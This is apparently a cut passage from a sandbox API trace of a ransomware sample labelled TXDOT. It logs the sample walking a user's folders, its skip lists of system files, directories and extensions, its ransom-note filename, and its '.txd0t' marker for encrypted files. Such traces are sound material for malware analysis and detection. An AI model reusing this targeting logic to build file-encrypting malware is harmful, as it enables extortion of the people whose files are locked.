StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.152] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4428f2bb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4428f2bb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce90d59d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0090.152] StrCmpW (psz1="Desktop.lnk", psz2=".") returned 1 [0090.152] StrCmpW (psz1="Desktop.lnk", psz2="..") returned 1 [0090.152] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0090.152] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0090.152] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="Desktop.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\Desktop.lnk") returned="C:\\Users\\FD1HVy\\Links\\Desktop.lnk" [0090.153] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0090.153] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="bootsect.bak") returned 1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="iconcache.db") returned -1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="thumbs.db") returned -1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2=" ransomware ") returned 1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2=" ransom ") returned 1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="debug.txt") returned 1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="boot.ini") returned 1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="desktop.ini") returned 1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="autorun.inf") returned 1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="ntuser.dat") returned -1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="ntldr") returned -1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="ntdetect.com") returned -1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="bootfont.bin") returned 1 [0090.153] StrCmpIW (psz1="Desktop.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.153] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0090.153] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0090.153] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442b54f3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x442b54f3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcec7abde, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x3ae, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0090.153] StrCmpW (psz1="Downloads.lnk", psz2=".") returned 1 [0090.153] StrCmpW (psz1="Downloads.lnk", psz2="..") returned 1 [0090.153] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0090.153] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0090.153] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="Downloads.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\Downloads.lnk") returned="C:\\Users\\FD1HVy\\Links\\Downloads.lnk" [0090.153] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0090.153] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0090.153] StrCmpIW (psz1="Downloads.lnk", psz2="bootsect.bak") returned 1 [0090.153] StrCmpIW (psz1="Downloads.lnk", psz2="iconcache.db") returned -1 [0090.153] StrCmpIW (psz1="Downloads.lnk", psz2="thumbs.db") returned -1 [0090.153] StrCmpIW (psz1="Downloads.lnk", psz2=" ransomware ") returned 1 [0090.153] StrCmpIW (psz1="Downloads.lnk", psz2=" ransom ") returned 1 [0090.153] StrCmpIW (psz1="Downloads.lnk", psz2="debug.txt") returned 1 [0090.153] StrCmpIW (psz1="Downloads.lnk", psz2="boot.ini") returned 1 [0090.154] StrCmpIW (psz1="Downloads.lnk", psz2="desktop.ini") returned 1 [0090.154] StrCmpIW (psz1="Downloads.lnk", psz2="autorun.inf") returned 1 [0090.154] StrCmpIW (psz1="Downloads.lnk", psz2="ntuser.dat") returned -1 [0090.154] StrCmpIW (psz1="Downloads.lnk", psz2="ntldr") returned -1 [0090.154] StrCmpIW (psz1="Downloads.lnk", psz2="ntdetect.com") returned -1 [0090.154] StrCmpIW (psz1="Downloads.lnk", psz2="bootfont.bin") returned 1 [0090.154] StrCmpIW (psz1="Downloads.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.154] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0090.154] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0090.154] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0090.154] StrCmpW (psz1="OneDrive.lnk", psz2=".") returned 1 [0090.154] StrCmpW (psz1="OneDrive.lnk", psz2="..") returned 1 [0090.154] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0090.154] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0090.154] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="OneDrive.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk") returned="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk" [0090.154] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0090.154] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="bootsect.bak") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="iconcache.db") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="thumbs.db") returned -1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2=" ransomware ") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2=" ransom ") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="debug.txt") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="boot.ini") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="desktop.ini") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="autorun.inf") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="ntuser.dat") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="ntldr") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="ntdetect.com") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="bootfont.bin") returned 1 [0090.154] StrCmpIW (psz1="OneDrive.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.154] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0090.154] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0090.155] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 0 [0090.155] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0090.155] GetProcessHeap () returned 0xe30000 [0090.155] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.155] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0090.155] StrCmpW (psz1="Local Settings", psz2=".") returned 1 [0090.155] StrCmpW (psz1="Local Settings", psz2="..") returned 1 [0090.155] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0090.155] StrCmpW (psz1="Music", psz2=".") returned 1 [0090.155] StrCmpW (psz1="Music", psz2="..") returned 1 [0090.155] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.155] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.155] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Music", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\boot\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\programdata\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\drivers\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\wsus\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="crypt_detect") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="cryptolocker") returned 0x0 [0090.155] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="ransomware") returned 0x0 [0090.156] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0090.156] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.156] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\Program Files") returned 0x0 [0090.156] GetProcessHeap () returned 0xe30000 [0090.156] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xec75a0 [0090.156] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.156] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\*") returned="C:\\Users\\FD1HVy\\Music\\*" [0090.156] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0090.156] StrCmpW (psz1=".", psz2=".") returned 0 [0090.156] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.203] StrCmpW (psz1="..", psz2=".") returned 1 [0090.203] StrCmpW (psz1="..", psz2="..") returned 0 [0090.203] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b94cac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51b94cac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.203] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.203] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.203] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.203] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.203] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt" [0090.203] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.203] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.203] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.204] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26955360, ftCreationTime.dwHighDateTime=0x1d5ebeb, ftLastAccessTime.dwLowDateTime=0x211fab0, ftLastAccessTime.dwHighDateTime=0x1d5e435, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10af4, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="33TPGnDT5IeW5L2R8Q.wav.txd0t", cAlternateFileName="33TPGN~1.TXD")) returned 1 [0090.204] StrCmpW (psz1="33TPGnDT5IeW5L2R8Q.wav.txd0t", psz2=".") returned 1 [0090.204] StrCmpW (psz1="33TPGnDT5IeW5L2R8Q.wav.txd0t", psz2="..") returned 1 [0090.204] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.204] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.204] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="33TPGnDT5IeW5L2R8Q.wav.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t" [0090.204] PathFindExtensionW (pszPath="33TPGnDT5IeW5L2R8Q.wav.txd0t") returned=".txd0t" [0090.204] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.204] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.204] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.204] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.204] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="ESQxTLKmutc", cAlternateFileName="ESQXTL~1")) returned 1 [0090.204] StrCmpW (psz1="ESQxTLKmutc", psz2=".") returned 1 [0090.204] StrCmpW (psz1="ESQxTLKmutc", psz2="..") returned 1 [0090.204] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.204] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.204] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="ESQxTLKmutc", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\system32\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\system\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\local\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\boot\\") returned 0x0 [0090.204] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\perflogs\\") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\programdata\\") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\drivers\\") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\wsus\\") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="crypt_detect") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="cryptolocker") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="ransomware") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\WINDOWS") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.205] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\Program Files") returned 0x0 [0090.205] GetProcessHeap () returned 0xe30000 [0090.205] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c4) returned 0xecaff8 [0090.205] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0090.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\*", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*" [0090.205] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, 